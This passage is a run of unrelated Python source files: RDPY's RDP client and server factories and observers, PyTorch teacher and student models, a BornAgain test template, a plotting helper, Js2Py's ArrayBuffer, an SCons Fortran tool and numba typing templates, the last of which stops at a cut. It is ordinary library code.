pdu.data.BitmapData(destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, data) if isCompress: bitmapData.flags.value = pdu.data.BitmapFlag.BITMAP_COMPRESSION self._pduLayer.sendBitmapUpdatePDU([bitmapData]) class ClientFactory(layer.RawLayerClientFactory): """ @summary: Factory of Client RDP protocol @param reason: twisted reason """ def connectionLost(self, csspLayer, reason): #retrieve controller tpktLayer = csspLayer._layer x224Layer = tpktLayer._presentation mcsLayer = x224Layer._presentation secLayer = mcsLayer._channels[mcs.Channel.MCS_GLOBAL_CHANNEL] pduLayer = secLayer._presentation controller = pduLayer._listener controller.onClose() def buildRawLayer(self, addr): """ @summary: Function call from twisted and build rdp protocol stack @param addr: destination address """ controller = RDPClientController() self.buildObserver(controller, addr) return controller.getProtocol() def buildObserver(self, controller, addr): """ @summary: Build observer use for connection @param controller: RDPClientController @param addr: destination address """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "buildObserver", "ClientFactory")) class ServerFactory(layer.RawLayerServerFactory): """ @summary: Factory of Server RDP protocol """ def __init__(self, colorDepth, privateKeyFileName = None, certificateFileName = None): """ @param colorDepth: color depth of session @param privateKeyFileName: file contain server private key (if none -> back to standard RDP security) @param certficiateFileName: file that contain public key (if none -> back to standard RDP security) """ self._colorDepth = colorDepth self._privateKeyFileName = privateKeyFileName self._certificateFileName = certificateFileName def connectionLost(self, tpktLayer, reason): """ @param reason: twisted reason """ #retrieve controller x224Layer = tpktLayer._presentation mcsLayer = x224Layer._presentation secLayer = mcsLayer._channels[mcs.Channel.MCS_GLOBAL_CHANNEL] pduLayer = secLayer._presentation controller = pduLayer._listener controller.onClose() def buildRawLayer(self, addr): """ @summary: Function call from twisted and build rdp protocol stack @param addr: destination address """ controller = RDPServerController(self._colorDepth, self._privateKeyFileName, self._certificateFileName) self.buildObserver(controller, addr) return controller.getProtocol() def buildObserver(self, controller, addr): """ @summary: Build observer use for connection @param controller: RDP stack controller @param addr: destination address """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "buildObserver", "ServerFactory")) class RDPClientObserver(object): """ @summary: Class use to inform all RDP event handle by RDPY """ def __init__(self, controller): """ @param controller: RDP controller use to interact with protocol """ self._controller = controller self._controller.addClientObserver(self) def onReady(self): """ @summary: Stack is ready and connected """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onReady", "RDPClientObserver")) def onSessionReady(self): """ @summary: Windows session is ready """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onSessionReady", "RDPClientObserver")) def onClose(self): """ @summary: Stack is closes """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onClose", "RDPClientObserver")) def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data): """ @summary: Notify bitmap update @param destLeft: xmin position @param destTop: ymin position @param destRight: xmax position because RDP can send bitmap with padding @param destBottom: ymax position because RDP can send bitmap with padding @param width: width of bitmap @param height: height of bitmap @param bitsPerPixel: number of bit per pixel @param isCompress: use RLE compression @param data: bitmap data """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onUpdate", "RDPClientObserver")) class RDPServerObserver(object): """ @summary: Class use to inform all RDP event handle by RDPY """ def __init__(self, controller): """ @param controller: RDP controller use to interact with protocol """ self._controller = controller self._controller.addServerObserver(self) def onReady(self): """ @summary: Stack is ready and connected May be called after an setColorDepth too """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onReady", "RDPServerObserver")) def onClose(self): """ @summary: Stack is closes """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onClose", "RDPClientObserver")) def onKeyEventScancode(self, code, isPressed, isExtended): """ @summary: Event call when a keyboard event is catch in scan code format @param code: {integer} scan code of key @param isPressed: {boolean} True if key is down @param isExtended: {boolean} True if a special key """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onKeyEventScanCode", "RDPServerObserver")) def onKeyEventUnicode(self, code, isPressed): """ @summary: Event call when a keyboard event is catch in unicode format @param code: unicode of key @param isPressed: True if key is down """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onKeyEventUnicode", "RDPServerObserver")) def onPointerEvent(self, x, y, button, isPressed): """ @summary: Event call on mouse event @param x: x position @param y: y position @param button: 1, 2, 3, 4 or 5 button @param isPressed: True if mouse button is pressed """ raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onPointerEvent", "RDPServerObserver"))
# MIT License # # Copyright (c) 2018 Jonathan Lorraine, Google LLC import numpy as np import torch import torch.nn as nn from torch.autograd import Variable import torch.nn.functional as F from .unet import UNet from .resnet import ResNet18 class CBRStudent(nn.Module): def __init__(self, num_channels, num_classes): super(CBRStudent, self).__init__() self.layer1 = nn.Sequential( nn.Conv2d(num_channels, 32, kernel_size=5, stride=2, padding=2), nn.BatchNorm2d(32), nn.ReLU(), nn.MaxPool2d(kernel_size=3, stride=2)) self.layer2 = nn.Sequential( nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2), nn.BatchNorm2d(64), nn.ReLU(), nn.MaxPool2d(kernel_size=3, stride=2)) fcsize = 64 if num_channels == 1 else 256 self.fc_pi = nn.Linear(fcsize, num_classes) def forward(self, x): out = self.layer1(x) out = self.layer2(out) out = out.reshape(out.size(0), -1) out_pi = self.fc_pi(out) return out_pi class UNetTeacher(nn.Module): def __init__(self, num_channels, args): super(UNetTeacher, self).__init__() self.unet = UNet(in_channels=num_channels, n_classes=1, depth=2, wf=3, padding=True, batch_norm=True, do_noise_channel=False, up_mode='upsample',use_identity_residual=False) self.bg_weight = args.bg self.min_std = args.min_std self.max_std = args.max_std self.use_exp = args.use_exp self.dataset = args.dataset def forward(self, x): out = self.unet(x).squeeze() # should be of shape N x H x W # print(out.shape) out = F.softmax(out.reshape(x.size(0),-1)) out = out.reshape(x.size(0), x.size(2), x.size(3)).unsqueeze(1) out = out.repeat(1, 2, 1, 1) # shape N x 2 x H x W meshgrid_x, meshgrid_y = torch.meshgrid(torch.arange(x.size(2)),torch.arange(x.size(3))) mesh = torch.stack([meshgrid_x, meshgrid_y], dim=0).unsqueeze(0).cuda() mesh = mesh.repeat(x.size(0), 1,1,1) # shape N x 2 x H x W mean = torch.sum(out*mesh, dim=[2,3]) # shape N x 2 std = self.min_std mask = self.bg_weight + torch.exp(torch.sum(-1*(mean.view(-1,2, 1,1) - mesh)**2 / (2*std**2), dim=1)) return mask.unsqueeze(1) class CBRTeacher(nn.Module): def __init__(self, num_channels): super(CBRTeacher, self).__init__() self.layer1 = nn.Sequential( nn.Conv2d(num_channels, 32, kernel_size=5, stride=2, padding=2), nn.BatchNorm2d(32), nn.ReLU(), nn.MaxPool2d(kernel_size=3, stride=2)) self.layer2 = nn.Sequential( nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2), nn.BatchNorm2d(64), nn.ReLU(), nn.MaxPool2d(kernel_size=3, stride=2)) fcsize = 64 if num_channels == 1 else 256 self.fc_cent = nn.Linear(fcsize, 2) self.fc_std = nn.Linear(fcsize, 2) def forward(self, x): out = self.layer1(x) out = self.layer2(out) out = out.reshape(out.size(0), -1) mean = x.size(2)//2 + x.size(2)//2*torch.tanh(self.fc_cent(out)) std = 2 + 10*torch.sigmoid(self.fc_std(out)) # print(mean.mean(dim=0), std.mean(dim=0)) meshgrid_x, meshgrid_y = torch.meshgrid(torch.arange(x.size(2)),torch.arange(x.size(3))) mesh = torch.stack([meshgrid_x, meshgrid_y], dim=0).unsqueeze(0).cuda() mesh = mesh.repeat(x.size(0), 1,1,1) mask = 0.5 + torch.exp(torch.sum(-1*(mean.view(-1,2, 1,1) - mesh)**2 / (2*std**2).view(-1,2,1,1), dim=1)) print(mean.mean(), mean.std(),std.mean(), std.std()) return mask.unsqueeze(1).repeat(1, x.size(1), 1, 1) class GaussianDropout(nn.Module): def __init__(self, dropout): super(GaussianDropout, self).__init__() self.dropout = dropout def forward(self, x): """ Sample noise e ~ N(1, alpha) Multiply noise h = h_ * e """ # N(1, alpha) if self.training: dropout = F.sigmoid(self.dropout) if x.is_cuda: epsilon = torch.randn(x.size()).cuda() * (dropout / (1 - dropout)) + 1 else: epsilon = torch.randn(x.size()) * (dropout / (1 - dropout)) + 1 return x * epsilon else: ''' epsilon = torch.randn(x.size()).double() * (model.dropout / (1 - model.dropout)) + 1 if x.is_cuda: epsilon = epsilon.cuda() return x * epsilon ''' return x class BernoulliDropout(nn.Module): def __init__(self, dropout): super(BernoulliDropout, self).__init__() self.dropout = dropout def forward(self, x): """ Sample noise e ~ N(1, alpha) Multiply noise h = h_ * e """ temperature = 0.5 # N(1, alpha) if self.training: u = Variable(torch.rand(x.size())) if x.is_cuda: u = u.cuda() z = F.sigmoid(self.dropout) + torch.log(u / (1 - u)) a = F.sigmoid(z / temperature) return x * a else: return x class reshape(nn.Module): def __init__(self, size): super(reshape, self).__init__() self.size = size def forward(self, x): return x.view(-1, self.size) class SimpleConvNet(nn.Module): def __init__(self, batch_norm=True, dropType='bernoulli', conv_drop1=0.0, conv_drop2=0.0, fc_drop=0.0): super(SimpleConvNet, self).__init__() self.batch_norm = batch_norm self.dropType = dropType if dropType == 'bernoulli': self.conv1_dropout = nn.Dropout(conv_drop1) self.conv2_dropout = nn.Dropout(conv_drop2) self.fc_dropout = nn.Dropout(fc_drop) elif dropType == 'gaussian': self.conv1_dropout = GaussianDropout(conv_drop1) self.conv2_dropout = GaussianDropout(conv_drop2) self.fc_dropout = GaussianDropout(fc_drop) if batch_norm: self.layer1 = nn.Sequential( nn.Conv2d(1, 16, kernel_size=5, padding=2), nn.BatchNorm2d(16), nn.ReLU(), self.conv1_dropout, nn.MaxPool2d(2)) self.layer2 = nn.Sequential( nn.Conv2d(16, 32, kernel_size=5, padding=2), nn.BatchNorm2d(32), nn.ReLU(), self.conv2_dropout, nn.MaxPool2d(2)) else: self.layer1 = nn.Sequential( nn.Conv2d(1, 16, kernel_size=5, padding=2), nn.ReLU(), self.conv1_dropout, nn.MaxPool2d(2)) self.layer2 = nn.Sequential( nn.Conv2d(16, 32, kernel_size=5, padding=2), nn.ReLU(), self.conv2_dropout, nn.MaxPool2d(2)) self.fc = nn.Linear(7*7*32, 10) def forward(self, x): out = self.layer1(x) out = self.layer2(out) out = out.view(out.size(0), -1) out = self.fc_dropout(self.fc(out)) return out class CNN(nn.Module): def __init__(self, num_layers, dropout, size, weight_decay, in_channel, imsize, do_alexnet=False, num_classes=10): super(CNN, self).__init__() self.dropout = Variable(torch.FloatTensor([dropout]), requires_grad=True) self.weight_decay = Variable(torch.FloatTensor([weight_decay]), requires_grad=True) self.do_alexnet = do_alexnet self.num_classes = num_classes self.in_channel = in_channel self.imsize = imsize if self.do_alexnet: self.features = nn.Sequential( nn.Conv2d(self.in_channel, 64, kernel_size=3, stride=2, padding=1), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2), nn.Conv2d(64, 192, kernel_size=3, padding=1), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2), nn.Conv2d(192, 384, kernel_size=3, padding=1), nn.ReLU(inplace=True), nn.Conv2d(384, 256, kernel_size=3, padding=1), nn.ReLU(inplace=True), nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2), ) if imsize == 32: self.view_size = 256 * 2 * 2 elif imsize == 28: self.view_size = 256 self.classifier = nn.Sequential( nn.Dropout(), nn.Linear(self.view_size, 4096), nn.ReLU(inplace=True), nn.Dropout(), nn.Linear(4096, 4096), nn.ReLU(inplace=True), nn.Linear(4096, self.num_classes), ) else: self.features = nn.Sequential( nn.Conv2d(self.in_channel, 20, kernel_size=3, stride=2, padding=1), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2), ) if imsize == 32: self.view_size = 20 * 8 * 8 elif imsize == 28: self.view_size = 980 self.classifier = nn.Sequential( nn.Dropout(), nn.Linear(self.view_size, 250), nn.ReLU(inplace=True), #nn.Dropout(), #nn.Linear(250, 250), #nn.ReLU(inplace=True), nn.Linear(250, self.num_classes), ) def do_train(self): self.features.train() self.classifier.train() def do_eval(self): self.features.train() self.classifier.train() def forward(self, x): x = self.features(x) x = x.view(x.size(0), -1) x = self.classifier(x) return x def L2_loss(self): loss = 0 for p in self.parameters(): loss += torch.sum(torch.mul(p, p)) return loss * (10 ** self.weight_decay) def all_L2_loss(self): loss = 0 count = 0 for p in self.parameters(): #val = torch.flatten(p) - self.weight_decay[count: count + p.numel()] loss += torch.sum( torch.mul(torch.exp(self.weight_decay[count: count + p.numel()]), torch.flatten(torch.mul(p, p)))) #loss += 1e-3 * torch.sum(torch.mul(val, val)) count += p.numel() return loss class Net(nn.Module): def __init__(self, num_layers, dropout, size, channel, weight_decay, num_classes=10, do_res=False, do_classification=True): super(Net, self).__init__() self.dropout = Variable(torch.FloatTensor([dropout]), requires_grad=True) self.weight_decay = Variable(torch.FloatTensor([weight_decay]), requires_grad=True) self.imsize = size * size * channel if not do_classification: self.imsize = size * channel self.do_res = do_res l_sizes = [self.imsize, self.imsize] + [50] * 20 network = [] # self.Gaussian = BernoulliDropout(self.dropout) # network.append(nn.Dropout()) for i in range(num_layers): network.append(nn.Linear(l_sizes[i], l_sizes[i + 1])) # network.append(self.Gaussian) network.append(nn.ReLU()) #network.append(nn.Dropout()) network.append(nn.Linear(l_sizes[num_layers], num_classes)) self.net = nn.Sequential(*network) def forward(self, x): cur_shape = x.shape if not self.do_res: return self.net(x.view(-1, self.imsize))# .reshape(cur_shape) else: res = self.net(x.view(-1, self.imsize)).reshape(cur_shape) return x + res def do_train(self): self.net.train() def do_eval(self): self.net.eval() def L2_loss(self): loss = .0 for p in self.parameters(): loss = loss + torch.sum(torch.mul(p, p)) * torch.exp(self.weight_decay) return loss def all_L2_loss(self): loss = .0 count = 0 for p in self.parameters(): loss = loss + torch.sum( torch.mul(torch.exp(self.weight_decay[count: count + p.numel()]), torch.flatten(torch.mul(p, p)))) count += p.numel() return loss
""" Turns a Python example into a functional persistence test via CMake machinery. """ import sys import os import glob sys.path.append("@CMAKE_LIBRARY_OUTPUT_DIRECTORY@") import bornagain as ba REFERENCE_DIR = "@PYPERSIST_REFERENCE_DIR@" EXAMPLE_DIR = "@EXAMPLE_DIR@" EXAMPLE_NAME = "@EXAMPLE_NAME@" OUTPUT_DIR = "@OUTPUT_DIR@" TOLERANCE = @PYPERSIST_TOLERANCE@ sys.path.append(EXAMPLE_DIR) example = __import__(EXAMPLE_NAME) simulationObject = None def get_simulation_SpecularSimulation(): """ Returns custom simulation for SpecularSimulation.py. """ simulation = example.get_simulation(scan_size=10) return simulation def get_simulation_DepthProbe(): """ Returns custom simulation in the case of depth probe. """ simulation = example.get_simulation() beam = simulation.getInstrument().getBeam() wavelength = beam.getWavelength() incl_axis = simulation.getAlphaAxis() z_axis = simulation.getZAxis() footprint = beam.footprintFactor() simulation.setBeamParameters( wavelength, 10, incl_axis.getMin(), incl_axis.getMax(), footprint) simulation.setZSpan(10, z_axis.getMin(), z_axis.getMax()) return simulation def get_simulation_RectangularGrating(): """ Returns custom simulation for RectangularGrating.py. Contains smaller detector to make MC integration happy on all platforms """ simulation = example.get_simulation() simulation.setDetectorParameters(5, -0.01*ba.deg, 0.01*ba.deg, 6, 0.0, 0.02*ba.deg) return simulation def get_simulation_GenericExample(): """ Returns minified simulation for majority of examples. Detector size is adjusted. The idea is that all other example's setting related to the simulation (MC integration flags, threads settings etc) remains intact. """ simulation = example.get_simulation() detector = simulation.getInstrument().getDetector() # preserving axes range, making less bins ax = detector.getAxis(0) ay = detector.getAxis(1) xmin, xmax = ax.getMin(), ax.getMax() ymin, ymax = ay.getMin(), ay.getMax() simulation.setDetectorParameters(5, xmin, xmax, 6, ymin, ymax) return simulation def get_minified_simulation(): """ Returns a simulation constructed from example simulation with smaller detector. """ if "ex06_Reflectometry" in EXAMPLE_DIR: return get_simulation_SpecularSimulation() elif EXAMPLE_NAME == "RectangularGrating": return get_simulation_RectangularGrating() elif EXAMPLE_NAME == "DepthProbe": return get_simulation_DepthProbe() else: return get_simulation_GenericExample() def adjusted_simulation(): """ Returns pre-calculated minified simulation. Function is intended for injection into python example file. """ global simulationObject return simulationObject def run_simulation(): """ Runs simulation and returns resulting intensity map. """ # create minified simulation object global simulationObject simulationObject = get_minified_simulation() # INJECTION HERE: replacing get_simulation() method of example with local method example.get_simulation = adjusted_simulation return example.run_simulation() def get_reffile_name(example_name): """ Returns full name of reference file for given basename """ reffiles = glob.glob(os.path.join(REFERENCE_DIR, example_name+".int.gz")) if len(reffiles) != 1: print("Can't find reference file in '{0}' for name '{1}'".format(REFERENCE_DIR, example_name)) print("Possible candidates", reffiles) return None return reffiles[0] def save_result(result, filename): """ Writing result to the file with given name into test output directory. """ fullname = os.path.join(OUTPUT_DIR, filename) print("Writing results in '{0}'".format(fullname)) try: ba.IntensityDataIOFactory.writeSimulationResult(result, fullname) except Exception as err: print("Exception caught, failed to write file", err) def check_result(result, example_name): print("Checking results for '{}'".format(example_name)) reffile = get_reffile_name(example_name) if not reffile: save_result(result, example_name+".int.gz") raise Exception("Absent reference file") print("Loading reference file '{}'".format(reffile)) reference = ba.IntensityDataIOFactory.readOutputData(reffile) diff = ba.getRelativeDifference(ba.importArrayToOutputData(result.array()), reference) if diff > TOLERANCE: print("Failure - Difference {0} is above tolerance level {1}".format(diff, TOLERANCE)) reffile_basename = os.path.basename(reffile) save_result(result, reffile_basename) raise Exception("Tolerance exceeded") else: print("Success - Difference {0} is below tolerance level{1}".format(diff, TOLERANCE)) def process_result(result, example_name): try: check_result(result, example_name) return 0 except Exception: return 1 def process_example(): result = run_simulation() nfailures = 0 if type(result) is dict: for dict_key, subresult in result.items(): nfailures += process_result(subresult, EXAMPLE_NAME + "." + str(dict_key)) else: nfailures += process_result(result, EXAMPLE_NAME) return nfailures if __name__ == '__main__': sys.exit(process_example())
from . import header def panel(idx,**args): '''Switch to panel idx. The nx,ny (and optionally gapx,gapy, and start) parameters should only be set for the first call to panel(). Thereafter, those values will be remembered. There are nx,ny panels in a grid. The space between panels in the x and y directions is controlled by gapx and gapy. By default, panels are counted from the top left going across, then down. To start at the bottom left going across and up, set the start keyword to 'bottom'. idx - Current panel number, (starts counting at 1) Optional **args: nx - Number of panels in x direction (defaults to 1) ny - Number of panels in y direction (defaults to 1) gapx - space between panels in the x direction (defaults to 2) gapy - space between panels in the y direction (defaults to 2) start - Panel number 1 will be at the top-left ('top') or bottom-left ('bottom'). Defaults to 'top' ''' _allowed = ['nx','ny','gapx','gapy','start'] fp = header._wipopen('panel',args.keys(),_allowed) if args.has_key('nx') and args.has_key('ny'): # start new panels header._panelobj.resize(**args) fp.write('set xsubmar %f\n' %header._panelobj.gapx) fp.write('set ysubmar %f\n' %header._panelobj.gapy) elif args.has_key('nx') or args.has_key('ny'): header._error('panel(): you must specify nx and ny!') if idx not in range(1,header._panelobj.nx*header._panelobj.ny+1): header._error('panel(): idx must be between 1 and nx*ny!') header._panelobj.idx = idx - 1 if header._panelobj.start == 'top': fp.write('panel %d %d %d\n' %(header._panelobj.nx,header._panelobj.ny,-1*idx)) else: fp.write('panel %d %d %d\n' %(header._panelobj.nx,header._panelobj.ny,idx)) fp.write('color %s\n' %header._optionsobj.color) fp.write('font %s\n' %header._optionsobj.font) fp.write('expand %s\n' %header._optionsobj.size) fp.write('lstyle %s\n' %header._optionsobj.lstyle) fp.write('lwidth %s\n' %header._optionsobj.lwidth) fp.write('bgci %s\n' %header._optionsobj.bg) fp.close()
# this is based on jsarray.py # todo check everything :) from ..base import * try: import numpy except: pass @Js def ArrayBuffer(): a = arguments[0] if isinstance(a, PyJsNumber): length = a.to_uint32() if length!=a.value: raise MakeError('RangeError', 'Invalid array length') temp = Js(bytearray([0]*length)) return temp return Js(bytearray([0])) ArrayBuffer.create = ArrayBuffer ArrayBuffer.own['length']['value'] = Js(None) ArrayBuffer.define_own_property('prototype', {'value': ArrayBufferPrototype, 'enumerable': False, 'writable': False, 'configurable': False}) ArrayBufferPrototype.define_own_property('constructor', {'value': ArrayBuffer, 'enumerable': False, 'writable': False, 'configurable': True})
"""SCons.Tool.ifl Tool-specific initialization for the Intel Fortran compiler. There normally shouldn't be any need to import this module directly. It will usually be imported through the generic SCons.Tool.Tool() selection method. """ # # Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "src/engine/SCons/Tool/ifl.py 5023 2010/06/14 22:05:46 scons" import SCons.Defaults from SCons.Scanner.Fortran import FortranScan from FortranCommon import add_all_to_env def generate(env): """Add Builders and construction variables for ifl to an Environment.""" fscan = FortranScan("FORTRANPATH") SCons.Tool.SourceFileScanner.add_scanner('.i', fscan) SCons.Tool.SourceFileScanner.add_scanner('.i90', fscan) if 'FORTRANFILESUFFIXES' not in env: env['FORTRANFILESUFFIXES'] = ['.i'] else: env['FORTRANFILESUFFIXES'].append('.i') if 'F90FILESUFFIXES' not in env: env['F90FILESUFFIXES'] = ['.i90'] else: env['F90FILESUFFIXES'].append('.i90') add_all_to_env(env) env['FORTRAN'] = 'ifl' env['SHFORTRAN'] = '$FORTRAN' env['FORTRANCOM'] = '$FORTRAN $FORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' env['FORTRANPPCOM'] = '$FORTRAN $FORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' env['SHFORTRANCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' env['SHFORTRANPPCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' def exists(env): return env.Detect('ifl') # Local Variables: # tab-width:4 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=4 shiftwidth=4:
from __future__ import print_function, division, absolute_import import itertools from numba import types, intrinsics from numba.utils import PYVERSION, RANGE_ITER_OBJECTS, operator_map from numba.typing.templates import (AttributeTemplate, ConcreteTemplate, AbstractTemplate, builtin_global, builtin, builtin_attr, signature, bound_function, make_callable_template) for obj in RANGE_ITER_OBJECTS: builtin_global(obj, types.range_type) builtin_global(len, types.len_type) builtin_global(slice, types.slice_type) builtin_global(abs, types.abs_type) builtin_global(print, types.print_type) @builtin class Print(ConcreteTemplate): key = types.print_type intcases = [signature(types.none, ty) for ty in types.integer_domain] realcases = [signature(types.none, ty) for ty in types.real_domain] cases = intcases + realcases @builtin class PrintOthers(AbstractTemplate): key = types.print_type def accepted_types(self, ty): if ty in types.integer_domain or ty in types.real_domain: return True if isinstance(ty, types.CharSeq): return True def generic(self, args, kws): assert not kws, "kwargs to print is not supported." for a in args: if not self.accepted_types(a): raise TypeError("Type %s is not printable." % a) return signature(types.none, *args) @builtin class Abs(ConcreteTemplate): key = types.abs_type int_cases = [signature(ty, ty) for ty in types.signed_domain] real_cases = [signature(ty, ty) for ty in types.real_domain] complex_cases = [signature(ty.underlying_float, ty) for ty in types.complex_domain] cases = int_cases + real_cases + complex_cases @builtin class Slice(ConcreteTemplate): key = types.slice_type cases = [ signature(types.slice3_type), signature(types.slice3_type, types.none, types.none), signature(types.slice3_type, types.none, types.intp), signature(types.slice3_type, types.intp, types.none), signature(types.slice3_type, types.intp, types.intp), signature(types.slice3_type, types.intp, types.intp, types.intp), signature(types.slice3_type, types.none, types.intp, types.intp), signature(types.slice3_type, types.intp, types.none, types.intp), signature(types.slice3_type, types.none, types.none, types.intp), ] @builtin class Range(ConcreteTemplate): key = types.range_type cases = [ signature(types.range_state32_type, types.int32), signature(types.range_state32_type, types.int32, types.int32), signature(types.range_state32_type, types.int32, types.int32, types.int32), signature(types.range_state64_type, types.int64), signature(types.range_state64_type, types.int64, types.int64), signature(types.range_state64_type, types.int64, types.int64, types.int64), signature(types.unsigned_range_state64_type, types.uint64), signature(types.unsigned_range_state64_type, types.uint64, types.uint64), signature(types.unsigned_range_state64_type, types.uint64, types.uint64, types.uint64), ] @builtin class GetIter(AbstractTemplate): key = "getiter" def generic(self, args, kws): assert not kws [obj] = args if isinstance(obj, types.IterableType): return signature(obj.iterator_type, obj) @builtin class IterNext(AbstractTemplate): key = "iternext" def generic(self, args, kws): assert not kws [it] = args if isinstance(it, types.IteratorType): return signature(types.Pair(it.yield_type, types.boolean), it) @builtin class PairFirst(AbstractTemplate): """ Given a heterogenous pair, return the first element. """ key = "pair_first" def generic(self, args, kws): assert not kws [pair] = args if isinstance(pair, types.Pair): return signature(pair.first_type, pair) @builtin class PairSecond(AbstractTemplate): """ Given a heterogenous pair, return the second element. """ key = "pair_second" def generic(self, args, kws): assert not kws [pair] = args if isinstance(pair, types.Pair): return signature(pair.second_type, pair) def choose_result_bitwidth(*inputs): return max(types.intp.bitwidth, *(tp.bitwidth for tp in inputs)) def choose_result_int(*inputs): """ Choose the integer result type for an operation on integer inputs, according to the integer typing NBEP. """ bitwidth = choose_result_bitwidth(*inputs) signed = any(tp.signed for tp in inputs) return types.Integer.from_bitwidth(bitwidth, signed) # The "machine" integer types to take into consideration for operator typing # (according to the integer typing NBEP) machine_ints = ( sorted(set((types.intp, types.int64))) + sorted(set((types.uintp, types.uint64))) ) # Explicit integer rules for binary operators; smaller ints will be # automatically upcast. integer_binop_cases = tuple( signature(choose_result_int(op1, op2), op1, op2) for op1, op2 in itertools.product(machine_ints, machine_ints) ) class BinOp(ConcreteTemplate): cases = list(integer_binop_cases) cases += [signature(op, op, op) for op in sorted(types.real_domain)] cases += [signature(op, op, op) for op in sorted(types.complex_domain)] @builtin class BinOpAdd(BinOp): key = "+" @builtin class BinOpSub(BinOp): key = "-" @builtin class BinOpMul(BinOp): key = "*" @builtin class BinOpDiv(BinOp): key = "/?" @builtin class BinOpMod(ConcreteTemplate): key = "%" cases = list(integer_binop_cases) cases += [signature(op, op, op) for op in sorted(types.real_domain)] @builtin class BinOpTrueDiv(ConcreteTemplate): key = "/" cases = [signature(types.float64, op1, op2) for op1, op2 in itertools.product(machine_ints, machine_ints)] cases += [signature(op, op, op) for op in sorted(types.real_domain)] cases += [signature(op, op, op) for op in sorted(types.complex_domain)] @builtin class BinOpFloorDiv(ConcreteTemplate): key = "//" cases = list(integer_binop_cases) cases += [signature(op, op, op) for op in sorted(types.real_domain)] @builtin class BinOpPower(ConcreteTemplate): key = "**" cases = list(integer_binop_cases) cases += [signature(types.float64, types.float64, op) for op in sorted(types.signed_domain)] cases += [signature(types.float64, types.float64, op) for op in sorted(types.unsigned_domain)] cases += [signature(op, op, op) for op in sorted(types.real_domain)] cases += [signature(op, op, op) for op in sorted(types.complex_domain)] class PowerBuiltin(BinOpPower): key = pow # TODO add 3 operand version builtin_global(pow, types.Function(PowerBuiltin)) class BitwiseShiftOperation(ConcreteTemplate): cases = list(integer_binop_cases) @builtin class BitwiseLeftShift(BitwiseShiftOperation): key = "<<" @builtin class BitwiseRightShift(BitwiseShiftOperation): key = ">>" class BitwiseLogicOperation(BinOp): cases = list(integer_binop_cases) @builtin class BitwiseAnd(BitwiseLogicOperation): key = "&" @builtin class BitwiseOr(BitwiseLogicOperation): key = "|" @builtin class BitwiseXor(BitwiseLogicOperation): key = "^" # Bitwise invert and negate are special: we must not upcast the operand # for unsigned numbers, as that would change the result. # (i.e. ~np.int8(0) == 255 but ~np.int32(0) == 4294967295). @builtin class BitwiseInvert(ConcreteTemplate): key = "~" cases = [signature(types.int8, types.boolean)] cases += [signature(choose_result_int(op), op) for op in types.unsigned_domain] cases += [signature(choose_result_int(op), op) for op in types.signed_domain] class UnaryOp(ConcreteTemplate): cases = [signature(choose_result_int(op), op) for op in types.unsigned_domain] cases += [signature(choose_result_int(op), op) for op in types.signed_domain] cases += [signature(op, op) for op in sorted(types.real_domain)] cases += [signature(op, op) for op in sorted(types.complex_domain)] @builtin class UnaryNegate(UnaryOp): key = "-" @builtin class UnaryPositive(UnaryOp): key = "+" @builtin class UnaryNot(ConcreteTemplate): key = "not" cases = [signature(types.boolean, types.boolean)] cases += [signature(types.boolean, op) for op in sorted(types.signed_domain)] cases += [signature(types.boolean, op) for op in sorted(types.unsigned_domain)] cases += [signature(types.boolean, op) for op in sorted(types.real_domain)] cases += [signature(types.boolean, op) for op in sorted(types.complex_domain)] class OrderedCmpOp(ConcreteTemplate): cases = [signature(types.boolean, types.boolean, types.boolean)] cases += [signature(types.boolean, op, op) for op in sorted(types.signed_domain)] cases += [signature(types.boolean, op, op) for op in sorted(types.unsigned_domain)] cases += [signature(types.boolean, op, op) for op in sorted(types.real_domain)] class 